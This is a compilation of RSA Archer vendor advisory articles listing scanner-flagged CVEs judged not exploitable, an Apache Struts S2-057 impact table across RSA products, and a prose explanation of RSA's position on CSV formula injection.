Archer Community

Article Number 000037069 CVE ID The CVE IDs are listed in the table below. Applies To RSA Product Set: Archer​ RSA Product/Service Type: Archer​ RSA Version/Condition: 6.5.0 Article Summary CVE ID: The Common Vulnerabilities and Exposures Identifiers (CVE IDs) are listed in the table below.   Issue Summary: This article provides a list of security vulnerabilities that cannot be exploited on Dell EMC RSA Archer 6.5.0, but which may be flagged by security scanners.   Link to Advisories: Each CVE ID listed can be searched using the following link: https://web.nvd.nist.gov/view/vuln/search. Once there, you can search for each CVE ID referenced in this article for more details.   Impact Details: The vulnerabilities listed in the table below are in order by the date on which RSA Archer Engineering determined that RSA Archer 6.5.0 was not vulnerable.     CVE ID Summary of Vulnerability Reason Product is Not Vulnerable Date Determined False Positive CVE-2012-6708 & duplicate CVE-2017-16011 jQuery 1.4.1 & 1.4rc1 vulnerable to cross-site scripting (XSS) due to way it determines whether input is HTML code The reported association to jQuery is invalid. October 1, 2018 CVE-2018-8046 ExtJS subcomponent getTip() vulnerable to cross-site scripting (XSS) even when passed HTML-escaped data Archer prevents XSS attacks by sanitizing the input. Not exploitable. October 4, 2018 CVE-2013-2035 HawtJNI subcomponent vulnerable to race condition before 1.8 when custom library path not specified. GemFire caching does not leverage the vulnerable component. October 15, 2018 CVE-2018-12536 Jetty through 9.4.x is prone to a timing channel in util/security/Password.java GemFire is not vulnerable to this CVE as static files are not served in the area of the vulnerability. October 15, 2018       Link to Advisories https://web.nvd.nist.gov/view/vuln/search Alert Impact Not Exploitable Disclaimer Read and use the information in this RSA Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact RSA Software Technical Support at 1- 800 995 5095. RSA Security LLC and its affiliates, including without limitation, its ultimate parent company, Dell EMC, distributes RSA Security Advisories in order to bring to the attention of users of the affected RSA products, important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided 'as is' without warranty of any kind. RSA disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall RSA, its affiliates or suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA, its affiliates or suppliers have been advised of the possibility of such damages. Some jurisdictions do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.

Article Number 000036587 CVE ID CVE-2017-1000048, CVE-2018-1270, CVE-2018-1271, CVE-2018-1272, CVE-2018-1273, CVE-2018-1274, CVE-2015-9251 Applies To RSA Product Set: Archer​ RSA Product/Service Type: Archer​ RSA Version/Condition: 6.4 SP1 ​   Article Summary CVE ID: The Common Vulnerabilities and Exposures Identifiers (CVE IDs) are listed in the table below.   Issue Summary: This article provides a list of security vulnerabilities that cannot be exploited on Dell EMC RSA Archer 6.4 SP1, but which may be flagged by security scanners.   Link to Advisories: Each CVE ID listed can be searched using the following link: https://web.nvd.nist.gov/view/vuln/search. Once there, you can search for each CVE ID referenced in this article for more details.   Impact Details: The vulnerabilities listed in the table below are in order by the date on which RSA Archer Engineering determined that RSA Archer 6.4 SP1 was not vulnerable.     CVE ID Summary of Vulnerability Reason Product is Not Vulnerable Date Determined False Positive CVE-2017-1000048 ljharb's qs module older than v6.3.2, v6.2.3, v6.1.2, and v6.0.4 is vulnerable to a denial-of-service (DoS). Component version used is higher than the impacted version. June 13, 2018 CVE-2018-1270 Spring Framework is vulnerable to remote code execution (RCE) due to lack of proper validation of user-supplied input. GemFire caching does not leverage the vulnerable component. June 13, 2018 CVE-2018-1271 Spring Framework is vulnerable to directory traversal due to the way static content can be loaded. GemFire does not serve files from the file system. June 19, 2018 CVE-2018-1272 Spring Framework is vulnerable to privilege escalation due to insufficient validation of user-supplied input. GemFire caching does not leverage the vulnerable component. June 17, 2018 CVE-2018-1273 Spring Data Commons contain a property binder vulnerability caused by improper neutralization of special elements. GemFire is not shipped with the vulnerable component. June 29, 2018 CVE-2018-1274 Spring Data Commons is vulnerable to denial-of-service (DoS) because it does not check for lengthy path names. GemFire is not shipped with the vulnerable component. June 29, 2018 CVE-2015-9251   Library is vulnerable to cross-site scripting (XSS) attack caused by a lack of user input sanitization. Local help system is not leveraged by web server component involving user session and user input. July 5, 2018       Link to Advisories https://web.nvd.nist.gov/view/vuln/search Alert Impact Not Exploitable Disclaimer Read and use the information in this RSA Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact RSA Software Technical Support at 1- 800 995 5095. RSA Security LLC and its affiliates, including without limitation, its ultimate parent company, Dell EMC, distributes RSA Security Advisories in order to bring to the attention of users of the affected RSA products, important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided 'as is' without warranty of any kind. RSA disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall RSA, its affiliates or suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA, its affiliates or suppliers have been advised of the possibility of such damages. Some jurisdictions do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.

Article Number 000036658 CVE ID 000036658 Article Summary On August 22, 2018, Apache Software Foundation disclosed a vulnerability in Apache Struts 2 that could allow an attacker to execute arbitrary commands remotely on affected systems. For more information on this vulnerability, please review the Apache security advisory (S2-057). Link to Advisories Apache: https://cwiki.apache.org/confluence/display/WW/S2-057 Resolution RSA is aware of and investigating the impact of this vulnerability on our products. The following table contains the latest available impact information. The table will be updated as additional information becomes available.   RSA Product Name Versions Impact Status Details Last Updated RSA 3D Secure/Adaptive Authentication eCommerce All Supported Not Impacted Product does not use Apache Struts. 2018-08-24 RSA Access Manager 6.2, 6.2.1, 6.2.2, 6.2.3, 6.2.4 Not Impacted Product uses Apache Struts but not impacted by this issue. 2018-08-30 RSA Adaptive Authentication Cloud All Supported Not Impacted   2018-08-24 RSA Adaptive Authentication Hosted All Supported Not Impacted Product does not use Apache Struts. 2018-08-28 RSA Adaptive Authentication On-Prem 7.x Not Impacted Product does not use impacted version of Apache Struts. 2018-08-28 RSA Archer Hosted N/A Not Impacted   2018-08-24 RSA Archer Platform All Supported Not Impacted Product does not use Apache Struts. 2018-08-24 RSA Archer Security Operations Management (SecOps) All Supported Not Impacted Product does not use Apache Struts. 2018-08-24 RSA Archer Vulnerability & Risk Manager (VRM) All Supported Not Impacted Product does not use Apache Struts. 2018-08-24 RSA Authentication Client (RAC) All Supported Investigating   2018-08-24 RSA Authentication Manager All Supported Not Impacted   2018-08-24 RSA Authentication Manager Web Tier All Supported Not Impacted   2018-08-27 RSA BSAFE C Products: MES, Crypto-C ME, SSL-C All Supported Not Impacted Product does not use Apache Struts. 2018-08-24 RSA BSAFE Java Products: Cert-J, Crypto-J, SSL-J All Supported Not Impacted Product does not use Apache Struts. 2018-08-24 RSA Central All Supported Not Impacted Product does not use Apache Struts. 2018-10-25 RSA Data Loss Prevention All Supported Not Impacted Product does not use Apache Struts. 2018-08-24 RSA Data Protection Manager All Supported Not Impacted   2018-08-31 RSA DCS: RSA Certificate Manager All Supported Not Impacted Product does not use Apache Struts. 2018-08-24 RSA DCS: RSA Validation Manager All Supported Not Impacted Product does not use impacted version of Apache Struts. 2018-08-27 RSA eFraudNetwork (eFN) All Supported Not Impacted   2018-08-24 RSA Federated Identity Manager All Supported Not Impacted Product does not use impacted version of Apache Struts. 2018-08-27 RSA FraudAction (OTMS) All Supported Not Impacted   2018-08-24 RSA Identity Governance and Lifecycle Software (RSA Via Lifecycle and Governance Software, RSA Identity Management & Governance Software) All Supported Not Impacted Product does not use Apache Struts. 2018-08-24 RSA Identity Governance and Lifecycle Appliance (RSA Via Lifecycle and Governance Appliance, RSA Identity Management & Governance Appliance) All Supported Not Impacted Product does not use Apache Struts. 2018-08-24 RSA Identity Governance and Lifecycle SaaS / MyAccessLive (RSA Via Lifecycle and Governance SaaS / MyAccessLive) All Supported Not Impacted Product does not use Apache Struts. 2018-08-24 RSA Identity Governance and Lifecycle Virtual Application All Supported Not Impacted Product does not use Apache Struts. 2018-08-29 RSA NetWitness Endpoint (ECAT) All Supported Not Impacted Product does not use Apache Struts. 2018-08-24 RSA NetWitness Logs & Packets / Security Analytics (Hardware and Virtual Appliances) All Supported Not Impacted Product does not use Apache Struts. 2018-08-24 RSA NetWitness Live Infrastructure All Supported Not Impacted Product does not use Apache Struts. 2018-08-24 RSA SecurID Access Cloud Service All Supported Not Impacted   2018-08-24 RSA SecurID Access IDR VM All Supported Not Impacted   2018-08-24 RSA SecurID Agent for PAM All Supported Not Impacted   2018-08-24 RSA SecurID Agent for Web All Supported Not Impacted   2018-08-24 RSA SecurID Agent for Windows All Supported Not Impacted   2018-08-24 RSA SecurID Authenticate App for Android All Supported Investigating   2018-08-24 RSA SecurID Authenticate App for iOS All Supported Investigating   2018-08-24 RSA SecurID Authenticate App for Windows 10 All Supported Investigating   2018-08-24 RSA SecurID Authentication Engine All Supported Not Impacted   2018-08-24 RSA SecurID Authentication SDK All Supported Not Impacted   2018-08-24 RSA SecurID Software Token Converter All Supported Not Impacted   2018-08-24 RSA SecurID Software Token for Android All Supported Not Impacted   2018-08-24 RSA SecurID Software Token for Blackberry All Supported Not Impacted   2018-08-24 RSA SecurID Software Token for Desktop All Supported Not Impacted   2018-08-24 RSA SecurID Software Token for iPhone All Supported Not Impacted   2018-08-24 RSA SecurID Software Token for Windows Mobile All Supported Not Impacted   2018-08-24 RSA SecurID Software Token Toolbar All Supported Not Impacted   2018-08-24 RSA SecurID Software Token Web SDK All Supported Not Impacted   2018-08-24 RSA SecurID Transaction Signing SDK All Supported Not Impacted   2018-08-24 RSA SYN Current Hosted Environment Not Impacted Product does not use Apache Struts. 2018-11-01 RSA Web Threat Detection All Supported Not Impacted Product does not use Apache Struts 2018-08-24

Article Number 000036742 Applies To RSA Product Set: RSA Archer RSA Version/Condition: 6.1.x and later Article Summary RSA Archer team occasionally receives reports - from customers performing penetration tests - on injection vulnerability detection when the RSA Archer application allows formula characters to be stored in the system and later exported directly to a comma-separated values (CSV) file. When the CSV is opened in a spreadsheet application, like Microsoft Excel or LibreOffice Calc, the formula is executed, which can cause arbitrary program execution on the user’s system and exfiltrate file contents, system information, etc. CSV is an interchange format defined in RFC 4180 from the Internet Engineering Task Force (IETF). This format is typically used for exchanging data between two applications. The vulnerability report provides an attack scenario where, under certain circumstances, the exported formulas could be executed by a spreadsheet application opening the CSV file. The spreadsheet applications warn users about potential command execution when they open the CSV file (e.g. “Do not enable this content unless you trust the source of the file” is a warning Microsoft Excel shows to users), but users may trust the source of the file as it has come from an internal application. Resolution RSA Archer team has assessed this vulnerability report and determined it is not a vulnerability in our product, but rather a side effect of the CSV format. We believe that this issue should be mitigated by the application which would be interpreting the user-exported CSV file rather than by the application creating it. The penetration reports are often accompanied by resolutions suggesting the escape or removal of the formula trigger characters. These suggestions, however, modify data in RSA Archer which can result in hard-to-debug issues like duplicate records or reports of version/audit updates when such CSVs are later imported. At this time, our analysis has concluded the negative side effects of a change to RSA Archer for this issue does not benefit the majority of our customers. RSA Archer will update this article if any new information is available in the future. RSA Archer customers are recommended to follow security best practices documented here: https://community.rsa.com/docs/DOC-94422  

Article Number 000039766 CVE ID The CVE IDs are listed in the table below. Link to Advisories Each CVE ID listed can be searched using the following link: https://web.nvd.nist.gov/view/vuln/search. Once there, you can search for each CVE ID referenced in this article for more details. Alert Impact Explanation The vulnerabilities listed in the table below are in order by the date on which RSA Archer Engineering determined that the RSA Archer [Product Version] was not vulnerable.   Embedded Component CVE ID Summary of Vuln. Reason why product is not Vuln. Data Determined False Positive ARCHER-106818   CVE-2020-28488 jQueryUI is vulnerable to CVE-2020-28488 This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none. February 15, 2021 ARCHER-99300   N/A Highcharts versions prior to 7.2.2 or 8.1.1 are vulnerable to cross-site scripting (XSS) due to insufficient sanitization of user-supplied data. This could allow a remote attacker to inject arbitrary JavaScript and obtain sensitive information such as authentication tokens and user session cookies. **Note:** This issue only affects Highcharts if it is set up to accept unfiltered input from end users in the option configuration. The vulnerability is only applicable, if the product accepts unfiltered input from end users in the option configuration. Based on engineering investigation we do not, so this issue is a false-positive for the Archer platform. October 27,2020   ARCHER-112994 CVE-2020-11023 CVE-2020-11022 CVE-2019-11358 CVE-2015-9251 Archer is using version 1.12.4 of jQuery Telerik, a third-party component of Archer, is running jQuery 1.12.4 version due to a code incompatibility with versions > 3.5, but they have patched the known vulnerabilities from versions prior to 3.5.1 into their version fo 1.12.4; therefore, reports of Archer using a vulnerable version of 1.12.4 jQuery are false-positive. May 17, 2021 Disclaimer Read and use the information in this RSA Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact RSA Software Technical Support at 1- 800 995 5095. RSA Security LLC and its affiliates, including without limitation, its ultimate parent company, Dell EMC, distributes RSA Security Advisories in order to bring to the attention of users of the affected RSA products, important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided 'as is' without warranty of any kind. RSA disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall RSA, its affiliates or suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA, its affiliates or suppliers have been advised of the possibility of such damages. Some jurisdictions do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.